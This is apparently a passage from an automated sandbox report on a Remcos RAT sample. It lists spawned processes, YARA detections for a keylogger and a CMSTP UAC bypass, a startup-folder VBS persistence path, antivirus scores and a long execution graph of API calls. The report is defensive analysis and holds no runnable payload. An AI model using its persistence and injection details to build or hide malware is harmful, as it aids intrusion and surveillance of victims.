                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000002.00000002.1398020611.0000000003600000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 66%, ReversingLabs
                                            • Detection: 61%, Virustotal, Browse
                                            Reputation:low
                                            Has exited:true

                                            Target ID:3
                                            Start time:18:06:49
                                            Start date:10/01/2025
                                            Path:C:\Windows\SysWOW64\svchost.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\OKkUGRkZV7.exe"
                                            Imagebase:0xcd0000
                                            File size:46'504 bytes
                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000003.00000002.1395816177.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:18:06:50
                                            Start date:10/01/2025
                                            Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                            Wow64 process (32bit):true
                                            Commandline:"c:\program files (x86)\internet explorer\iexplore.exe"
                                            Imagebase:0xb90000
                                            File size:828'368 bytes
                                            MD5 hash:6F0F06D6AB125A99E43335427066A4A1
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:6
                                            Start time:18:06:59
                                            Start date:10/01/2025
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ambiparous.vbs"
                                            Imagebase:0x7ff607f60000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:18:07:00
                                            Start date:10/01/2025
                                            Path:C:\Users\user\AppData\Local\lecheries\ambiparous.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\lecheries\ambiparous.exe"
                                            Imagebase:0xaf0000
                                            File size:1'323'520 bytes
                                            MD5 hash:F484F16874DDB071B45CB9F1FA8D0C56
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000007.00000002.1537946128.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                            Reputation:low
                                            Has exited:true

                                            Target ID:8
                                            Start time:18:07:04
                                            Start date:10/01/2025
                                            Path:C:\Windows\SysWOW64\svchost.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\AppData\Local\lecheries\ambiparous.exe"
                                            Imagebase:0xcd0000
                                            File size:46'504 bytes
                                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3786705466.0000000004EDE000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3786396527.0000000003200000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                            • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000008.00000002.3785910612.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.3786431770.0000000003212000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                            Reputation:high
                                            Has exited:false

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:3.4%
                                              Dynamic/Decrypted Code Coverage:0.4%
                                              Signature Coverage:8.6%
                                              Total number of Nodes:2000
                                              Total number of Limit Nodes:64
                                              execution_graph 101040 37fe27 101053 35f944 101040->101053 101042 37fe3d 101043 37fe53 101042->101043 101044 37febe 101042->101044 101142 349e5d 60 API calls 101043->101142 101062 34fce0 101044->101062 101046 37fe92 101047 38089c 101046->101047 101048 37fe9a 101046->101048 101144 3a9e4a 89 API calls 4 library calls 101047->101144 101143 3a834f 59 API calls Mailbox 101048->101143 101052 37feb2 Mailbox 101052->101052 101054 35f950 101053->101054 101055 35f962 101053->101055 101145 349d3c 60 API calls Mailbox 101054->101145 101057 35f991 101055->101057 101058 35f968 101055->101058 101156 349d3c 60 API calls Mailbox 101057->101156 101146 360db6 101058->101146 101061 35f95a 101061->101042 101185 348180 101062->101185 101064 34fd3d 101065 38472d 101064->101065 101112 3506f6 101064->101112 101190 34f234 101064->101190 101308 3a9e4a 89 API calls 4 library calls 101065->101308 101069 384742 101070 34fe3e 101071 38488d 101070->101071 101073 34fe4c 101070->101073 101312 3966ec 59 API calls 2 library calls 101070->101312 101071->101069 101071->101073 101314 3ba2d9 85 API calls Mailbox 101071->101314 101072 350517 101079 360db6 Mailbox 59 API calls 101072->101079 101081 3848f9 101073->101081 101129 384b53 101073->101129 101194 34837c 101073->101194 101074 3847d7 101074->101069 101310 3a9e4a 89 API calls 4 library calls 101074->101310 101119 350545 _memmove 101079->101119 101080 384848 101313 3960ef 59 API calls 2 library calls 101080->101313 101088 384917 101081->101088 101316 3485c0 59 API calls Mailbox 101081->101316 101084 384755 101084->101074 101309 34f6a3 331 API calls 101084->101309 101086 3848b2 Mailbox 101086->101073 101315 3966ec 59 API calls 2 library calls 101086->101315 101092 384928 101088->101092 101317 3485c0 59 API calls Mailbox 101088->101317 101089 34fea4 101098 34ff32 101089->101098 101099 384ad6 101089->101099 101135 350179 Mailbox _memmove 101089->101135 101090 38486b 101093 349ea0 331 API calls 101090->101093 101092->101135 101318 3960ab 59 API calls Mailbox 101092->101318 101093->101071 101094 360db6 59 API calls Mailbox 101102 34fdd3 101094->101102 101095 360db6 Mailbox 59 API calls 101140 350106 _memmove 101095->101140 101101 360db6 Mailbox 59 API calls 101098->101101 101327 3a9ae7 60 API calls 101099->101327 101105 34ff39 101101->101105 101102->101069 101102->101070 101102->101072 101102->101084 101102->101094 101116 38480c 101102->101116 101102->101119 101282 349ea0 101102->101282 101105->101112 101201 3509d0 101105->101201 101106 384a4d 101107 349ea0 331 API calls 101106->101107 101109 384a87 101107->101109 101109->101069 101322 3484c0 101109->101322 101111 34ffb2 101111->101112 101111->101119 101120 34ffe6 101111->101120 101307 3a9e4a 89 API calls 4 library calls 101112->101307 101311 3a9e4a 89 API calls 4 library calls 101116->101311 101118 384ab2 101326 3a9e4a 89 API calls 4 library calls 101118->101326 101119->101095 101126 350007 101120->101126 101328 348047 101120->101328 101125 360db6 59 API calls Mailbox 101125->101135 101126->101112 101128 384b24 101126->101128 101132 35004c 101126->101132 101127 350398 101127->101052 101332 349d3c 60 API calls Mailbox 101128->101332 101129->101069 101333 3a9e4a 89 API calls 4 library calls 101129->101333 101131 3500d8 101278 349d3c 60 API calls Mailbox 101131->101278 101132->101112 101132->101129 101132->101131 101134 3500eb 101134->101112 101279 3482df 59 API calls Mailbox 101134->101279 101135->101106 101135->101112 101135->101118 101135->101125 101135->101127 101136 384a1c 101135->101136 101280 348740 68 API calls __cinit 101135->101280 101281 348660 68 API calls 101135->101281 101319 3a5937 68 API calls 101135->101319 101320 3489b3 69 API calls Mailbox 101135->101320 101321 349d3c 60 API calls Mailbox 101135->101321 101137 360db6 Mailbox 59 API calls 101136->101137 101137->101106 101140->101135 101141 350162 101140->101141 101306 349c90 59 API calls Mailbox 101140->101306 101141->101052 101142->101046 101143->101052 101144->101052 101145->101061 101148 360dbe 101146->101148 101149 360dd8 101148->101149 101151 360ddc std::exception::exception 101148->101151 101157 36571c 101148->101157 101174 3633a1 DecodePointer 101148->101174 101149->101061 101175 36859b RaiseException 101151->101175 101153 360e06 101176 3684d1 58 API calls _free 101153->101176 101155 360e18 101155->101061 101156->101061 101158 365797 101157->101158 101162 365728 101157->101162 101183 3633a1 DecodePointer 101158->101183 101160 36579d 101184 368b28 58 API calls __getptd_noexit 101160->101184 101161 365733 101161->101162 101177 36a16b 58 API calls 2 library calls 101161->101177 101178 36a1c8 58 API calls 8 library calls 101161->101178 101179 36309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101161->101179 101162->101161 101165 36575b RtlAllocateHeap 101162->101165 101168 365783 101162->101168 101172 365781 101162->101172 101180 3633a1 DecodePointer 101162->101180 101165->101162 101166 36578f 101165->101166 101166->101148 101181 368b28 58 API calls __getptd_noexit 101168->101181 101182 368b28 58 API calls __getptd_noexit 101172->101182 101174->101148 101175->101153 101176->101155 101177->101161 101178->101161 101180->101162 101181->101172 101182->101166 101183->101160 101184->101166 101186 34818f 101185->101186 101189 3481aa 101185->101189 101334 347e4f 101186->101334 101188 348197 CharUpperBuffW 101188->101189 101189->101064 101191 34f251 101190->101191 101192 34f272 101191->101192 101338 3a9e4a 89 API calls 4 library calls 101191->101338 101192->101102 101195 34838d 101194->101195 101196 37edbd 101194->101196 101197 360db6 Mailbox 59 API calls 101195->101197 101198 348394 101197->101198 101199 3483b5 101198->101199 101339 348634 59 API calls Mailbox 101198->101339 101199->101081 101199->101089 101202 384cc3 101201->101202 101216 3509f5 101201->101216 101399 3a9e4a 89 API calls 4 library calls 101202->101399 101204 350cfa 101204->101111 101207 350ee4 101207->101204 101209 350ef1 101207->101209 101208 350a4b PeekMessageW 101277 350a05 Mailbox 101208->101277 101397 351093 331 API calls Mailbox 101209->101397 101211 350ef8 LockWindowUpdate DestroyWindow GetMessageW 101211->101204 101214 350f2a 101211->101214 101213 384e81 Sleep 101213->101277 101217 385c58 TranslateMessage DispatchMessageW GetMessageW 101214->101217 101215 350ce4 101215->101204 101396 351070 10 API calls Mailbox 101215->101396 101216->101277 101400 349e5d 60 API calls 101216->101400 101401 396349 331 API calls 101216->101401 101217->101217 101219 385c88 101217->101219 101219->101204 101220 384d50 TranslateAcceleratorW 101222 350e43 PeekMessageW 101220->101222 101220->101277 101221 350ea5 TranslateMessage DispatchMessageW 101221->101222 101222->101277 101223 350d13 timeGetTime 101223->101277 101224 38581f WaitForSingleObject 101226 38583c GetExitCodeProcess CloseHandle 101224->101226 101224->101277 101261 350f95 101226->101261 101227 350e5f Sleep 101259 350e70 Mailbox 101227->101259 101228 348047 59 API calls 101228->101277 101230 360db6 59 API calls Mailbox 101230->101277 101231 385af8 Sleep 101231->101259 101233 36049f timeGetTime 101233->101259 101235 350f4e timeGetTime 101398 349e5d 60 API calls 101235->101398 101238 385b8f GetExitCodeProcess 101243 385bbb CloseHandle 101238->101243 101244 385ba5 WaitForSingleObject 101238->101244 101241 3c5f25 110 API calls 101241->101259 101242 34b7dd 109 API calls 101242->101259 101243->101259 101244->101243 101244->101277 101246 349e5d 60 API calls 101246->101277 101247 385874 101247->101261 101248 385c17 Sleep 101248->101277 101249 385078 Sleep 101249->101277 101256 34fce0 304 API calls 101256->101277 101259->101233 101259->101238 101259->101241 101259->101242 101259->101247 101259->101248 101259->101249 101259->101261 101259->101277 101426 347667 101259->101426 101431 3a2408 60 API calls 101259->101431 101432 349e5d 60 API calls 101259->101432 101433 347de1 101259->101433 101437 3489b3 69 API calls Mailbox 101259->101437 101438 34b73c 331 API calls 101259->101438 101439 3964da 60 API calls 101259->101439 101440 3a5244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101259->101440 101441 3a3c55 66 API calls Mailbox 101259->101441 101260 347de1 59 API calls 101260->101277 101261->101111 101264 3a9e4a 89 API calls 101264->101277 101265 349c90 59 API calls Mailbox 101265->101277 101266 34b73c 304 API calls 101266->101277 101267 349ea0 304 API calls 101267->101277 101268 39617e 59 API calls Mailbox 101268->101277 101270 3484c0 69 API calls 101270->101277 101271 3855d5 VariantClear 101271->101277 101272 396e8f 59 API calls 101272->101277 101273 38566b VariantClear 101273->101277 101274 385419 VariantClear 101274->101277 101275 348cd4 59 API calls Mailbox 101275->101277 101276 3489b3 69 API calls 101276->101277 101277->101208 101277->101213 101277->101215 101277->101220 101277->101221 101277->101222 101277->101223 101277->101224 101277->101227 101277->101228 101277->101230 101277->101231 101277->101235 101277->101246 101277->101256 101277->101259 101277->101260 101277->101261 101277->101264 101277->101265 101277->101266 101277->101267 101277->101268 101277->101270 101277->101271 101277->101272 101277->101273 101277->101274 101277->101275 101277->101276 101340 34e6a0 101277->101340 101371 34f460 101277->101371 101390 3431ce 101277->101390 101395 34e420 331 API calls 101277->101395 101402 3c6018 59 API calls 101277->101402 101403 3a9a15 59 API calls Mailbox 101277->101403 101404 39d4f2 59 API calls 101277->101404 101405 349837 101277->101405 101423 3960ef 59 API calls 2 library calls 101277->101423 101424 348401 59 API calls 101277->101424 101425 3482df 59 API calls Mailbox 101277->101425 101278->101134 101279->101140 101280->101135 101281->101135 101283 349ebf 101282->101283 101301 349eed Mailbox 101282->101301 101284 360db6 Mailbox 59 API calls 101283->101284 101284->101301 101285 34b475 101286 348047 59 API calls 101285->101286 101295 34a057 101286->101295 101287 34b47a 101288 3809e5 101287->101288 101289 380055 101287->101289 102644 3a9e4a 89 API calls 4 library calls 101288->102644 102641 3a9e4a 89 API calls 4 library calls 101289->102641 101290 347667 59 API calls 101290->101301 101291 360db6 59 API calls Mailbox 101291->101301 101295->101102 101296 362d40 67 API calls __cinit 101296->101301 101297 380064 101297->101102 101299 348047 59 API calls 101299->101301 101301->101285 101301->101287 101301->101289 101301->101290 101301->101291 101301->101295 101301->101296 101301->101299 101302 396e8f 59 API calls 101301->101302 101303 3809d6 101301->101303 101305 34a55a 101301->101305 102639 34c8c0 331 API calls 2 library calls 101301->102639 102640 34b900 60 API calls Mailbox 101301->102640 101302->101301 102643 3a9e4a 89 API calls 4 library calls 101303->102643 102642 3a9e4a 89 API calls 4 library calls 101305->102642 101306->101140 101307->101065 101308->101069 101309->101074 101310->101069 101311->101069 101312->101080 101313->101090 101314->101086 101315->101086 101316->101088 101317->101092 101318->101135 101319->101135 101320->101135 101321->101135 101323 3484cb 101322->101323 101324 3484f2 101323->101324 102645 3489b3 69 API calls Mailbox 101323->102645 101324->101118 101326->101069 101327->101120 101329 348052 101328->101329 101330 34805a 101328->101330 102646 347f77 59 API calls 2 library calls 101329->102646 101330->101126 101332->101129 101333->101069 101335 347e62 101334->101335 101337 347e5f _memmove 101334->101337 101336 360db6 Mailbox 59 API calls 101335->101336 101336->101337 101337->101188 101338->101192 101339->101199 101341 34e6d5 101340->101341 101342 383aa9 101341->101342 101345 34e73f 101341->101345 101354 34e799 101341->101354 101343 349ea0 331 API calls 101342->101343 101344 383abe 101343->101344 101370 34e970 Mailbox 101344->101370 101443 3a9e4a 89 API calls 4 library calls 101344->101443 101348 347667 59 API calls 101345->101348 101345->101354 101346 347667 59 API calls 101346->101354 101350 383b04 101348->101350 101349 362d40 __cinit 67 API calls 101349->101354 101444 362d40 101350->101444 101352 383b26 101352->101277 101353 3484c0 69 API calls 101353->101370 101354->101346 101354->101349 101354->101352 101356 34e95a 101354->101356 101354->101370 101355 349ea0 331 API calls 101355->101370 101356->101370 101447 3a9e4a 89 API calls 4 library calls 101356->101447 101357 3a9e4a 89 API calls 101357->101370 101359 348d40 59 API calls 101359->101370 101367 34f195 101451 3a9e4a 89 API calls 4 library calls 101367->101451 101368 383e25 101368->101277 101369 34ea78 101369->101277 101370->101353 101370->101355 101370->101357 101370->101359 101370->101367 101370->101369 101442 347f77 59 API calls 2 library calls 101370->101442 101448 396e8f 59 API calls 101370->101448 101449 3bc5c3 331 API calls 101370->101449 101450 3bb53c 331 API calls Mailbox 101370->101450 101452 349c90 59 API calls Mailbox 101370->101452 101453 3b93c6 331 API calls Mailbox 101370->101453 101372 34f650 101371->101372 101373 34f4ba 101371->101373 101376 347de1 59 API calls 101372->101376 101374 34f4c6 101373->101374 101375 38441e 101373->101375 101630 34f290 331 API calls 2 library calls 101374->101630 101632 3bbc6b 331 API calls Mailbox 101375->101632 101382 34f58c Mailbox 101376->101382 101379 38442c 101383 34f630 101379->101383 101633 3a9e4a 89 API calls 4 library calls 101379->101633 101381 34f4fd 101381->101379 101381->101382 101381->101383 101532 3b445a 101382->101532 101541 344e4a 101382->101541 101547 3a3c37 101382->101547 101550 3acb7a 101382->101550 101383->101277 101385 34f5e3 101385->101383 101631 349c90 59 API calls Mailbox 101385->101631 101391 343212 101390->101391 101394 3431e0 101390->101394 101391->101277 101392 343205 IsDialogMessageW 101392->101391 101392->101394 101393 37cf32 GetClassLongW 101393->101392 101393->101394 101394->101391 101394->101392 101394->101393 101395->101277 101396->101207 101397->101211 101398->101277 101399->101216 101400->101216 101401->101216 101402->101277 101403->101277 101404->101277 101406 349851 101405->101406 101415 34984b 101405->101415 101407 37f4da 101406->101407 101408 349899 101406->101408 101409 349857 __itow 101406->101409 101410 37f5d3 __i64tow 101406->101410 101416 360db6 Mailbox 59 API calls 101407->101416 101421 37f552 Mailbox _wcscpy 101407->101421 102637 363698 83 API calls 3 library calls 101408->102637 101413 360db6 Mailbox 59 API calls 101409->101413 101410->101410 101414 349871 101413->101414 101414->101415 101417 347de1 59 API calls 101414->101417 101415->101277 101418 37f51f 101416->101418 101417->101415 101419 360db6 Mailbox 59 API calls 101418->101419 101420 37f545 101419->101420 101420->101421 101422 347de1 59 API calls 101420->101422 102638 363698 83 API calls 3 library calls 101421->102638 101422->101421 101423->101277 101424->101277 101425->101277 101427 360db6 Mailbox 59 API calls 101426->101427 101428 347688 101427->101428 101429 360db6 Mailbox 59 API calls 101428->101429 101430 347696 101429->101430 101430->101259 101431->101259 101432->101259 101434 347df0 __wsetenvp _memmove 101433->101434 101435 360db6 Mailbox 59 API calls 101434->101435 101436 347e2e 101435->101436 101436->101259 101437->101259 101438->101259 101439->101259 101440->101259 101441->101259 101442->101370 101443->101370 101454 362c44 101444->101454 101446 362d4b 101446->101354 101447->101370 101448->101370 101449->101370 101450->101370 101451->101368 101452->101370 101453->101370 101455 362c50 __write 101454->101455 101462 363217 101455->101462 101461 362c77 __write 101461->101446 101479 369c0b 101462->101479 101464 362c59 101465 362c88 DecodePointer DecodePointer 101464->101465 101466 362c65 101465->101466 101467 362cb5 101465->101467 101476 362c82 101466->101476 101467->101466 101525 3687a4 59 API calls __write 101467->101525 101469 362d18 EncodePointer EncodePointer 101469->101466 101470 362cc7 101470->101469 101471 362cec 101470->101471 101526 368864 61 API calls 2 library calls 101470->101526 101471->101466 101475 362d06 EncodePointer 101471->101475 101527 368864 61 API calls 2 library calls 101471->101527 101474 362d00 101474->101466 101474->101475 101475->101469 101528 363220 101476->101528 101480 369c2f EnterCriticalSection 101479->101480 101481 369c1c 101479->101481 101480->101464 101486 369c93 101481->101486 101483 369c22 101483->101480 101510 3630b5 58 API calls 3 library calls 101483->101510 101487 369c9f __write 101486->101487 101488 369ca8 101487->101488 101489 369cc0 101487->101489 101511 36a16b 58 API calls 2 library calls 101488->101511 101497 369ce1 __write 101489->101497 101514 36881d 58 API calls __malloc_crt 101489->101514 101492 369cad 101512 36a1c8 58 API calls 8 library calls 101492->101512 101493 369cd5 101495 369cdc 101493->101495 101496 369ceb 101493->101496 101515 368b28 58 API calls __getptd_noexit 101495->101515 101500 369c0b __lock 58 API calls 101496->101500 101497->101483 101498 369cb4 101513 36309f GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 101498->101513 101503 369cf2 101500->101503 101504 369d17 101503->101504 101505 369cff 101503->101505 101517 362d55 101504->101517 101516 369e2b InitializeCriticalSectionAndSpinCount 101505->101516 101508 369d0b 101523 369d33 LeaveCriticalSection _doexit 101508->101523 101511->101492 101512->101498 101514->101493 101515->101497 101516->101508 101518 362d5e RtlFreeHeap 101517->101518 101522 362d87 _free 101517->101522 101519 362d73 101518->101519 101518->101522 101524 368b28 58 API calls __getptd_noexit 101519->101524 101521 362d79 GetLastError 101521->101522 101522->101508 101523->101497 101524->101521 101525->101470 101526->101471 101527->101474 101531 369d75 LeaveCriticalSection 101528->101531 101530 362c87 101530->101461 101531->101530 101533 349837 84 API calls 101532->101533 101534 3b4494 101533->101534 101634 346240 101534->101634 101536 3b44a4 101537 349ea0 331 API calls 101536->101537 101538 3b44c9 101536->101538 101537->101538 101540 3b44cd 101538->101540 101659 349a98 59 API calls Mailbox 101538->101659 101540->101385 101542 344e54 101541->101542 101543 344e5b 101541->101543 101682 3653a6 101542->101682 101545 344e6a 101543->101545 101546 344e7b FreeLibrary 101543->101546 101545->101385 101546->101545 101952 3a445a GetFileAttributesW 101547->101952 101551 347667 59 API calls 101550->101551 101552 3acbaf 101551->101552 101553 347667 59 API calls 101552->101553 101554 3acbb8 101553->101554 101555 3acbcc 101554->101555 102152 349b3c 59 API calls 101554->102152 101557 349837 84 API calls 101555->101557 101558 3acbe9 101557->101558 101559 3accea 101558->101559 101560 3acc0b 101558->101560 101565 3acd1a Mailbox 101558->101565 101956 344ddd 101559->101956 101561 349837 84 API calls 101560->101561 101563 3acc17 101561->101563 101566 348047 59 API calls 101563->101566 101565->101385 101568 3acc23 101566->101568 101567 3acd16 101567->101565 101570 347667 59 API calls 101567->101570 101574 3acc69 101568->101574 101575 3acc37 101568->101575 101569 344ddd 136 API calls 101569->101567 101571 3acd4b 101570->101571 101572 347667 59 API calls 101571->101572 101573 3acd54 101572->101573 101577 347667 59 API calls 101573->101577 101576 349837 84 API calls 101574->101576 101578 348047 59 API calls 101575->101578 101579 3acc76 101576->101579 101580 3acd5d 101577->101580 101581 3acc47 101578->101581 101582 348047 59 API calls 101579->101582 101583 347667 59 API calls 101580->101583 102153 347cab 101581->102153 101585 3acc82 101582->101585 101586 3acd66 101583->101586 102160 3a4a31 GetFileAttributesW 101585->102160 101589 349837 84 API calls 101586->101589 101592 3acd73 101589->101592 101590 349837 84 API calls 101593 3acc5d 101590->101593 101591 3acc8b 101594 3acc9e 101591->101594 101597 3479f2 59 API calls 101591->101597 101980 34459b 101592->101980 101596 347b2e 59 API calls 101593->101596 101599 349837 84 API calls 101594->101599 101603 3acca4 101594->101603 101596->101574 101597->101594 101598 3acd8e 102031 3479f2 101598->102031 101601 3acccb 101599->101601 102161 3a37ef 75 API calls Mailbox 101601->102161 101603->101565 101604 3acdd1 101606 348047 59 API calls 101604->101606 101608 3acddf 101606->101608 101607 3479f2 59 API calls 101609 3acdae 101607->101609 102034 347b2e 101608->102034 101609->101604 102162 347bcc 101609->102162 101613 3acdc3 101615 347bcc 59 API calls 101613->101615 101614 347b2e 59 API calls 101616 3acdfb 101614->101616 101615->101604 101617 347b2e 59 API calls 101616->101617 101618 3ace09 101617->101618 101619 349837 84 API calls 101618->101619 101620 3ace15 101619->101620 102043 3a4071 101620->102043 101622 3ace26 101623 3a3c37 3 API calls 101622->101623 101624 3ace30 101623->101624 101625 349837 84 API calls 101624->101625 101629 3ace61 101624->101629 101626 3ace4e 101625->101626 102097 3a9155 101626->102097 101628 344e4a 84 API calls 101628->101565 101629->101628 101630->101381 101631->101385 101632->101379 101633->101383 101660 347a16 101634->101660 101636 34646a 101667 34750f 101636->101667 101638 346484 Mailbox 101638->101536 101641 347d8c 59 API calls 101647 346265 101641->101647 101642 346799 _memmove 101681 39f8aa 91 API calls 4 library calls 101642->101681 101643 34750f 59 API calls 101643->101647 101644 37dff6 101680 39f8aa 91 API calls 4 library calls 101644->101680 101646 37e004 101650 34750f 59 API calls 101646->101650 101647->101636 101647->101641 101647->101642 101647->101643 101647->101644 101652 37df92 101647->101652 101656 347e4f 59 API calls 101647->101656 101665 345f6c 60 API calls 101647->101665 101666 345d41 59 API calls Mailbox 101647->101666 101675 345e72 60 API calls 101647->101675 101676 347924 59 API calls 2 library calls 101647->101676 101651 37e01a 101650->101651 101651->101638 101677 348029 101652->101677 101655 37df9d 101658 360db6 Mailbox 59 API calls 101655->101658 101657 34643b CharUpperBuffW 101656->101657 101657->101647 101658->101642 101659->101540 101661 360db6 Mailbox 59 API calls 101660->101661 101662 347a3b 101661->101662 101663 348029 59 API calls 101662->101663 101664 347a4a 101663->101664 101664->101647 101665->101647 101666->101647 101668 3475af 101667->101668 101674 347522 _memmove 101667->101674 101670 360db6 Mailbox 59 API calls 101668->101670 101669 360db6 Mailbox 59 API calls 101671 347529 101669->101671 101670->101674 101672 360db6 Mailbox 59 API calls 101671->101672 101673 347552 101671->101673 101672->101673 101673->101638 101674->101669 101675->101647 101676->101647 101678 360db6 Mailbox 59 API calls 101677->101678 101679 348033 101678->101679 101679->101655 101680->101646 101681->101638 101683 3653b2 __write 101682->101683 101684 3653c6 101683->101684 101685 3653de 101683->101685 101717 368b28 58 API calls __getptd_noexit 101684->101717 101691 3653d6 __write 101685->101691 101695 366c11 101685->101695 101687 3653cb 101718 368db6 9 API calls __write 101687->101718 101691->101543 101696 366c43 EnterCriticalSection 101695->101696 101697 366c21 101695->101697 101699 3653f0 101696->101699 101697->101696 101698 366c29 101697->101698 101700 369c0b __lock 58 API calls 101698->101700 101701 36533a 101699->101701 101700->101699 101702 36535d 101701->101702 101703 365349 101701->101703 101709 365359 101702->101709 101720 364a3d 101702->101720 101763 368b28 58 API calls __getptd_noexit 101703->101763 101705 36534e 101764 368db6 9 API calls __write 101705->101764 101719 365415 LeaveCriticalSection LeaveCriticalSection _fseek 101709->101719 101713 365377 101737 370a02 101713->101737 101715 36537d 101715->101709 101716 362d55 _free 58 API calls 101715->101716 101716->101709 101717->101687 101718->101691 101719->101691 101721 364a50 101720->101721 101722 364a74 101720->101722 101721->101722 101723 3646e6 __fseek_nolock 58 API calls 101721->101723 101726 370b77 101722->101726 101724 364a6d 101723->101724 101765 36d886 101724->101765 101727 370b84 101726->101727 